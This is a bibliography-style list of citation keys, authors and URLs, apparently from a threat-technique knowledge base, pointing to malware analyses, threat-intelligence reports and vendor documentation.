Uptycs Bla Sharma, S. https://www.uptycs.com/blog/black-basta-ransomware-goes-cross-platform-now-targets-esxi-systems
Uptycs ConUptycs Thrhttps://www.uptycs.com/blog/confucius-apt-deploys-warzone-rat
Uptycs WaMohanta, Ahttps://www.uptycs.com/blog/warzone-rat-comes-with-uac-bypass-technique
VPNFilter Tung, Liam.https://www.zdnet.com/article/fbi-to-all-router-users-reboot-now-to-neuter-russias-vpnfilter-malware/
VectorSec vector_sechttps://x.com/vector_sec/status/896049052642533376
Villeneuve Villeneuve http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp_dissecting-l
VirusBulle Kim, J. et https://www.virusbulletin.com/virusbulletin/2020/03/vb2019-paper-kimsuky-group-tracking-king-spear
Visa FIN6 Visa Publi https://usa.visa.com/dam/VCOM/global/support-legal/documents/fin6-cybercrime-group-expands-thre
Visa RawP Visa. (201 https://usa.visa.com/dam/VCOM/download/merchants/alert-rawpos.pdf
Volexity E Gruzweig, Jhttps://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnera
Volexity I Cash, D., Ghttps://www.volexity.com/blog/2021/08/17/north-korean-apt-inkysquid-infects-victims-using-browser-e
Volexity I Cash, D., Ghttps://www.volexity.com/blog/2021/08/24/north-korean-bluelight-special-inkysquid-deploys-rokrat/
Volexity Iv Gurkok, C. https://www.volexity.com/blog/2024/01/15/ivanti-connect-secure-vpn-exploitation-goes-global/
Volexity Iv Meltzer, M.https://www.volexity.com/blog/2024/01/10/active-exploitation-of-two-zero-day-vulnerabilities-in-ivanti
Volexity O Adair, S. https://www.volexity.com/blog/2020/11/06/oceanlotus-extending-cyber-espionage-operations-through
Volexity O Lassalle, D https://www.volexity.com/blog/2017/11/06/oceanlotus-blossoms-mass-digital-surveillance-and-exploita
Volexity P Meltzer, M,https://www.volexity.com/blog/2018/06/07/patchwork-apt-group-targets-us-think-tanks/
Volexity Adair, S.. https://www.volexity.com/blog/2016/11/09/powerduke-post-election-spear-phishing-campaigns-targeti
Volexity S Cash, D. e https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-org
VulnerabiliKanthak, S.https://skanthak.homepage.t-online.de/sentinel.html
Wald0 GuidRobbins, A.https://wald0.com/?p=179
WeLiveSecu Matrosov, https://www.welivesecurity.com/2013/03/19/gapz-and-redyms-droppers-based-on-power-loader-code/
Wevtutil MMicrosoft. https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wevtutil
Wikibooks Wikibooks.https://en.wikibooks.org/wiki/Grsecurity/The_RBAC_System
Wikipedia Wikipedia. https://en.wikipedia.org/wiki/IEEE_802.1X
Wikipedia CWikipedia. https://en.wikipedia.org/wiki/Control-flow_integrity
Wikipedia Wikipedia. https://en.wikipedia.org/wiki/HTTP_Public_Key_Pinning
Wikipedia Wikipedia. https://en.wikipedia.org/wiki/Pwdump
Windows AMicrosoft. https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/network
Windows BlCowan, C. https://blogs.windows.com/msedgedev/2017/03/23/strengthening-microsoft-edge-sandbox/
Windows CTomonaga,https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html
Windows RMicrosoft. https://technet.microsoft.com/en-us/library/cc754272(v=ws.11).aspx
Wired LockGreenberg,https://www.wired.com/story/lockergoga-ransomware-crippling-industrial-firms/
XAgentOSXRobert Falchttps://researchcenter.paloaltonetworks.com/2017/02/unit42-xagentosx-sofacys-xagent-macos-tool/
ZScaler Ha Desai, D.. http://research.zscaler.com/2015/08/chinese-cyber-espionage-apt-group.html
ZScaler SquKumar, A., https://www.zscaler.com/blogs/security-research/squirrelwaffle-new-loader-delivering-cobalt-strike
Zdnet KimsCimpanu, Chttps://www.zdnet.com/article/cyber-espionage-group-uses-chrome-extension-to-infect-victims/
Zdnet KimsCimpanu, C. https://www.zdnet.com/article/north-korea-has-tried-to-hack-11-officials-of-the-un-security-council/
Zdnet NgroCimpanu, Chttps://www.zdnet.com/article/sly-malware-author-hides-cryptomining-botnet-behind-ever-shifting-pro
Zscaler AP Singh, S. a https://www.zscaler.com/blogs/security-research/apt-31-leverages-covid-19-vaccine-theme-and-abuses
Zscaler Ba Sadique, Mhttps://www.zscaler.com/blogs/research/spear-phishing-campaign-delivers-buer-and-bazar-malware
Zscaler Co Yadav, A., https://www.zscaler.com/blogs/research/cobian-rat-backdoored-rat
Zscaler HigSingh, S. S https://www.zscaler.com/blogs/security-research/return-higaisa-apt
Zscaler KasYadav, A., http://research.zscaler.com/2016/01/malicious-office-files-dropping-kasidet.html
Zscaler Ly Shivtarkar,https://www.zscaler.com/blogs/security-research/lyceum-net-dns-backdoor
Zscaler Pi Brett Stonehttps://www.zscaler.com/blogs/security-research/technical-analysis-pikabot
alientvaul PETER EWAN https://www.alienvault.com/blogs/labs-research/macspy-os-x-rat-as-a-service
applescriptSteven Sanhttps://www.engadget.com/2013/10/23/applescript-and-automator-gain-new-features-in-os-x-maveric
apt41_dcs DCSO CyTec https://medium.com/@DCSO_CyTec/apt41-the-spy-who-failed-to-encrypt-me-24fc0f49cad1
apt41_manMandiant. https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf
aptsim valsmith. http://carnal0wnage.attackresearch.com/2012/09/more-on-aptsim.html
audits linikWadhwa-Bro https://github.com/CiscoCXSecurity/linikatz/blob/master/blue/audit/audit.rules
byt3bl33d3Salvati, M. https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-
cisco_depl Cisco. (202https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/sec_conn_pki/configuration/xe-17/sec-pki-xe-17-b
cobaltstri Strategic C https://web.archive.org/web/20210825130434/https://cobaltstrike.com/downloads/csmanual38.pdf
create_symMicrosoft. https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/create-sy
def_ev_winChandel, R https://www.hackingarticles.in/defense-evasion-windows-event-logging-t1562-002/
dhcp_serv Microsoft. https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012
eSentire FIeSentire. https://www.esentire.com/security-advisories/notorious-cybercrime-gang-fin7-lands-malware-in-law-fir
emotet_hcOffice of I https://www.hhs.gov/sites/default/files/emotet-the-enduring-and-persistent-threat-to-the-hph-tlpclear
emotet_tr Kenefick, I https://www.trendmicro.com/en_us/research/23/c/emotet-returns-now-adopts-binary-padding-for-eva
evolution oYates, M. ( https://recon.cx/2017/montreal/resources/slides/RECON-MTL-2017-evolution_of_pirpi.pdf
f-secure ja Brod. (2013https://www.f-secure.com/weblog/archives/00002576.html
file_uploa YesWeRHacke https://blog.yeswehack.com/yeswerhackers/file-upload-attacks-part-2/
fsecure NaF-Secure Lahttps://www.f-secure.com/documents/996508/1030745/nanhaishu_whitepaper.pdf
group-ib_mRostovcev,https://www.group-ib.com/blog/muddywater-infrastructure/
group-ib_rGroup-IB. https://www.group-ib.com/resources/research-hub/red-curl/
group-ib_rGroup-IB. https://www.group-ib.com/resources/research-hub/red-curl-2/
hexed osx.fluffybunnyhttp://www.hexed.in/2019/07/osxdok-analysis.html
iSight San Ward, S.. ( https://web.archive.org/web/20160503234007/https://www.isightpartners.com/2014/10/cve-2014-411
jRAT SymanSharma, R.https://www.symantec.com/blogs/threat-intelligence/jrat-new-anti-parsing-techniques
mandiant_Roncone, G. https://services.google.com/fh/files/misc/apt44-unearthing-sandworm.pdf
mbed-crypARMmbed.https://github.com/ARMmbed/mbed-crypto
(
netlab360 rAlex Turinghttps://blog.netlab.360.com/rotajakiro_linux_version_of_oceanlotus/
ntlm_relayMollema, Dhttps://dirkjanm.io/worst-of-both-worlds-ntlm-relaying-and-kerberos-delegation/
objective-sWardle, Pathttps://objective-see.com/blog/blog_0x3B.html
objective-sWardle, Pathttps://objective-see.com/blog/blog_0x3D.html
objectives Patrick Wahttps://objective-see.com/blog/blog_0x4E.html
objsee macPatrick Wahttps://objective-see.com/blog/blog_0x25.html
on securityBoal, Calumhttps://www.onsecurity.io/blog/abusing-kerberos-from-linux/
paloalto T Ray, V., et https://unit42.paloaltonetworks.com/unit42-tropic-trooper-targets-taiwanese-government-and-fossil-fu
piazza launAntonio Piahttps://antman1p-30185.medium.com/defeating-malicious-launch-persistence-156e2b40fc67
reagentc_ Microsoft, https://learn.microsoft.com/en-us/windows-hardware/manufacture/desktop/reagentc-command-line-o
reed thief Thomas Ree https://blog.malwarebytes.com/mac/2020/07/mac-thiefquest-malware-may-not-be-ransomware-after-
sentinella Phil Stoke https://www.sentinelone.com/labs/resourceful-macos-malware-hides-in-named-fork/
sentinelon Phil Stoke https://www.sentinelone.com/labs/apt32-multi-stage-macos-trojan-innovates-on-crimeware-scripting-t
sentinelonePhil Stokeshttps://www.sentinelone.com/blog/coming-out-of-your-shell-from-shlayer-to-zshlayer/
sqlmap IntDamele, B.,http://sqlmap.org/
store_pwdMicrosoft. https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-pa
synack 201Patrick Wahttps://objective-see.org/blog/blog_0x16.html
tau bundloErika Noer https://blogs.vmware.com/security/2020/06/tau-threat-analysis-bundlore-macos-mm-install-macos.htm
therecord_Antoniuk, Dhttps://therecord.media/redcurl-hackers-russian-bank-australian-company
trendmicroMac Threathttps://documents.trendmicro.com/assets/pdf/XCSSET_Technical_Brief.pdf
trendmicroTancio et ahttps://www.trendmicro.com/en_us/research/24/c/unveiling-earth-kapre-aka-redcurls-cyberespionage-
unit42_ga Unit 42. ( https://unit42.paloaltonetworks.com/trident-ursa/
wardle evilPatrick Warhttps://objective-see.com/blog/blog_0x59.html
wardle evilPatrick Warhttps://objective-see.com/blog/blog_0x60.html
win10_asr Microsoft. https://docs.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction
win_xml_ev Forensics https://forensicswiki.xyz/wiki/index.php?title=Windows_XML_Event_Log_(EVTX)
xCmd Rayaprolu,https://ashwinrayaprolu.wordpress.com/2011/04/12/xcmd-an-alternative-to-psexec/
Überwachun Guarnieri, https://netzpolitik.org/2015/digital-attack-on-german-parliament-investigative-report-on-the-hack-of-th
Microsoft Microsoft. https://msdn.microsoft.com/library/windows/desktop/ms633574.aspx
Microsoft Microsoft. https://msdn.microsoft.com/library/windows/desktop/ms633584.aspx
Microsoft Microsoft. https://msdn.microsoft.com/library/windows/desktop/ms633591.aspx
Elastic Pro Hosseini, Ahttps://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-com
MalwareTeMalwareTec https://www.malwaretech.com/2013/08/powerloader-injection-something-truly.html
WeLiveSecu Matrosov, https://www.welivesecurity.com/2013/03/19/gapz-and-redyms-droppers-based-on-power-loader-code/
Microsoft Microsoft. https://msdn.microsoft.com/library/windows/desktop/ms644953.aspx
ProofPointCampbell, Bhttps://www.proofpoint.com/us/blog/threat-insight/serpent-no-swiping-new-backdoor-targets-french-e
Defending Harshal Tuphttps://blog.qualys.com/vulnerabilities-threat-research/2022/06/20/defending-against-scheduled-task-a
Twitter Le Loobeek, L https://x.com/leoloobeek/status/939248813465853953
Tarrask sc Microsoft Thttps://www.microsoft.com/security/blog/2022/04/12/tarrask-malware-uses-scheduled-tasks-for-defen
Microsoft Microsoft. https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-other-object-acce
TechNet ScMicrosoft. https://technet.microsoft.com/library/dd315590.aspx
Red CanaryRed Canaryhttps://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md
TechNet AuRussinovichhttps://technet.microsoft.com/en-us/sysinternals/bb963902
TechNet FoSatyajit321https://social.technet.microsoft.com/Forums/en-US/e5bca729-52e7-4fcb-ba12-3225c564674c/schedule
SigmaHQ Sittikorn S https://github.com/SigmaHQ/sigma/blob/master/rules/windows/registry/registry_delete/registry_delet
Stack OverStack Overfhttps://stackoverflow.com/questions/2913816/how-to-find-the-location-of-the-scheduled-tasks-folder
exatrack bpExaTrack. (https://exatrack.com/public/Tricephalic_Hellkeeper.pdf
crowdstrikeJamie Harrihttps://www.crowdstrike.com/blog/how-to-hunt-for-decisivearchitect-and-justforfun-implant/
Leonardo TLeonardo. https://www.leonardo.com/documents/20142/10868623/Malware+Technical+Insight+_Turla+%E2%80%
haking9 libLuis Martinhttp://recursos.aldabaknocking.com/libpcapHakin9LuisMartinGarcia.pdf
WinRAR H A. Roshal. https://www.rarlab.com/
WinZip Ho Corel Corpohttps://www.winzip.com/win/en/
7zip HomeI. Pavlov. https://www.7-zip.org/
diantz.exe_Living Off https://lolbas-project.github.io/lolbas/Binaries/Diantz/
Wikipedia Wikipedia. https://en.wikipedia.org/wiki/List_of_file_signatures
Attacking Administrathttps://pentestlab.blog/2012/10/30/attacking-vnc-servers/
MacOS VNCApple Supphttps://support.apple.com/guide/remote-desktop/set-up-a-computer-running-vnc-software-apdbed098
Havana autJay Pipes. https://lists.openstack.org/pipermail/openstack/2013-December/004138.html
macOS rootNick Miles https://www.tenable.com/blog/detecting-macos-high-sierra-root-account-without-authentication
Offensive Offensive Shttps://www.offensive-security.com/metasploit-unleashed/vnc-authentication/
Gnome Remo Pascal Nowhttps://gitlab.gnome.org/GNOME/gnome-remote-desktop/-/blob/9aa9181e/src/grd-settings.c#L207
Gnome Rem Pascal Nowhttps://gitlab.gnome.org/GNOME/gnome-remote-desktop/-/blob/9aa9181e/src/org.gnome.desktop.rem
Apple UnifSarah Edwar https://sarah-edwards-xzkc.squarespace.com/blog/2020/4/30/analysis-of-apple-unified-logs-quarantine
VNC Vulnera Sergiu Gat https://www.bleepingcomputer.com/news/security/dozens-of-vnc-vulnerabilities-found-in-linux-window
The Remote T. Richardshttps://datatracker.ietf.org/doc/html/rfc6143#section-7.2.2
VNC Authen Tegan. (20 https://help.realvnc.com/hc/en-us/articles/360002250097-Setting-up-System-Authentication
Hijacking Z3RO. (201https://int0x33.medium.com/day-70-hijacking-vnc-enum-brute-access-and-crack-d3d18a4601cc
FireEye W Ballenthin https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-man
Mandiant Mandiant. https://www.mandiant.com/resources/reports
(
WMI 6 Microsoft. https://www.microsoft.com/en-us/security/blog/2022/06/13/the-many-lives-of-blackcat-ransomware/
WMI 1-3 Microsoft. https://learn.microsoft.com/en-us/windows/win32/wmisdk/wmi-start-page?redirectedfrom=MSDN
WMI 7,8 Microsoft. https://techcommunity.microsoft.com/t5/windows-it-pro-blog/wmi-command-line-wmic-utility-depreca
CopyFromSMicrosoft. https://docs.microsoft.com/en-us/dotnet/api/system.drawing.graphics.copyfromscreen?view=netframe
Antiquate Thomas Ree https://blog.malwarebytes.com/threat-analysis/2017/01/new-mac-backdoor-using-antiquated-code/
Aquasec M Nitzan Ya https://www.aquasec.com/blog/muhstik-malware-targets-message-queuing-services-applications/
Elastic Bi Elastic. (n https://www.elastic.co/guide/en/security/7.17/prebuilt-rule-7-16-3-binary-executed-from-shared-mem
SecureList Legezo, D. https://securelist.com/a-new-secret-stash-for-fileless-malware/106393/
Microsoft FMicrosoft. https://learn.microsoft.com/microsoft-365/security/intelligence/fileless-threats
Sysdig Fil Nicholas Lahttps://sysdig.com/blog/containers-read-only-fileless-malware/
Akami FrogOri David. https://www.akamai.com/blog/security-research/fritzfrog-botnet-new-capabilities-log4shell
Anomali R Anomali Lab https://www.anomali.com/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang
Mandiant AMandiant. https://www.mandiant.com/resources/blog/unc3524-eye-spy-email
dns_changeAbendan, Ohttps://www.trendmicro.com/vinfo/us/threat-encyclopedia/web-attack/125/how-dns-changer-trojans-d
volexity_ Adair, S., https://www.volexity.com/blog/2022/06/15/driftingcloud-zero-day-sophos-firewall-exploitation-and-an
taxonomy_Alashwali, https://arxiv.org/abs/1809.05681
ad_blockerKuzmenko,https://securelist.com/ad-blocker-with-miner-included/101105/
Token tactiMicrosoft https://www.microsoft.com/en-us/security/blog/2022/11/16/token-tactics-how-to-prevent-detect-and-
mitm_tls_ praetorian https://www.praetorian.com/blog/man-in-the-middle-tls-ssl-protocol-downgrade-attack/
Rapid7 MiTRapid7. (n.https://www.rapid7.com/fundamentals/man-in-the-middle-attacks/
tlseminar_Team Cinnahttps://tlseminar.github.io/downgrade-attacks/
ttint_rat Tu, L. Ma, https://blog.netlab.360.com/ttint-an-iot-remote-control-trojan-spread-through-2-0-day-vulnerabilities/
show_ssh_Cisco. (202https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/security/s1/sec-s1-cr-book/sec-cr-s5.html
US-CERT TAUS-CERT. (2https://us-cert.cisa.gov/ncas/alerts/TA18-106A
amnesty_nAmnesty Int https://www.amnesty.org/en/latest/research/2021/07/forensic-methodology-report-how-to-catch-nso-
Mandiant ADouglas Biehttps://www.mandiant.com/resources/blog/apt29-continues-targeting-microsoft
FBI ProxiesFBI. (2022, https://www.ic3.gov/Media/News/2022/220818.pdf
Free Trial Gamazo, Wil https://unit42.paloaltonetworks.com/purpleurchin-steals-cloud-resources/
Koczwara BKoczwara, https://michaelkoczwara.medium.com/cobalt-strike-c2-hunting-with-shodan-c448d501a6e2
TrendmicroMax Gonchar https://documents.trendmicro.com/assets/wp/wp-criminal-hideouts-for-lease.pdf
Mandiant SStephens, https://www.mandiant.com/resources/scandalous-external-detection-using-network-scan-data-and-aut
ThreatConnThreatConnhttps://threatconnect.com/blog/infrastructure-research-hunting/
rundll32.e Ariel silve https://www.cynet.com/attack-techniques-hands-on/defense-evasion-techniques/
Attackify RAttackify. https://www.attackify.com/blog/rundll32_execution_order/
This is Se B. Ancel. https://www.stormshield.com/news/poweliks-command-line-confusion/
Github NoRgtworek. ( https://github.com/gtworek/PSBits/tree/master/NoRunDll
Trend MicrMerces, F. https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.
Docker APIDocker. (n.https://docs.docker.com/engine/api/v1.41/
KubernetesThe Kubernhttps://kubernetes.io/docs/concepts/overview/kubernetes-api/
AWS Lambd Adam Chest https://blog.xpnsec.com/aws-lambda-redirector/
Detecting Gary Golomb https://awakesecurity.com/blog/threat-hunting-series-detecting-command-control-in-the-cloud/
BlackWaterLawrence Ahttps://www.bleepingcomputer.com/news/security/blackwater-malware-abuses-cloudflare-workers-for
GWS Apps Sergiu Gatlhttps://www.bleepingcomputer.com/news/security/hackers-abuse-google-apps-script-to-steal-credit-ca
University Gardiner, Jhttps://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf
Wikipedia Wikipedia. https://en.wikipedia.org/wiki/Binary-to-text_encoding
Wikipedia Wikipedia. https://en.wikipedia.org/wiki/Character_encoding
GitHub PS Barrett Adahttps://github.com/peewpw/Invoke-PSImage
Malware An CISA. (202 https://www.cisa.gov/uscert/ncas/analysis-reports/ar20-303a
Trend MicrKaren Vict https://www.trendmicro.com/en_us/research/20/e/netwalker-fileless-ransomware-injected-via-reflecti
Securelist KONSTANTIN https://securelist.com/my-name-is-dtrack/93338/
Microsoft Microsoft. https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-shllink/c41e062d-f764-4f13-bd4f
SentinelLabPhil Stokeshttps://www.sentinelone.com/labs/fade-dead-adventures-in-reversing-malicious-run-only-applescripts/
Sentinel LaPhil Stokeshttps://www.sentinelone.com/labs/fade-dead-adventures-in-reversing-malicious-run-only-applescripts/
Apple PAMApple. (20 https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM
Man Pam_U die.net. (n https://linux.die.net/man/8/pam_unix
PAM CredsFernández,https://x-c3ll.github.io/posts/PAM-backdoor-DNS/
Red Hat P Red Hat. ( https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_ca
PAM Backdzephrax. (2https://github.com/zephrax/linux-pam-backdoor
Tech RepubHardiman, https://www.techrepublic.com/blog/the-enterprise-cloud/backing-up-and-restoring-snapshots-on-amaz
Google - R Google. (20https://cloud.google.com/compute/docs/disks/restore-and-delete-snapshots
ATT ScanB Blasco, J. https://cybersecurity.att.com/blogs/labs-research/scanbox-a-reconnaissance-framework-used-on-water
TrellixQak Pham Duy P https://www.trellix.com/blogs/research/qakbot-evolves-to-onenote-malware-distribution/
SSLShoppeSSL Shopper https://www.sslshopper.com/ssl-checker.html
Medium SSL Jain, M. (2 https://medium.com/@menakajain/export-download-ssl-certificate-from-server-site-url-bcfc41ea46a2
Talos KimsAn, J and Mhttps://blog.talosintelligence.com/2021/11/kimsuky-abuses-blogs-delivers-malware.html
Cisco Blog Omar Santos https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/41699
AdventuresTinaztepe, http://opensecuritytraining.info/Keylogging_files/The%20Adventures%20of%20a%20Keystroke.pdf
Microsoft FMicrosoft. https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/configure-contextual-file-
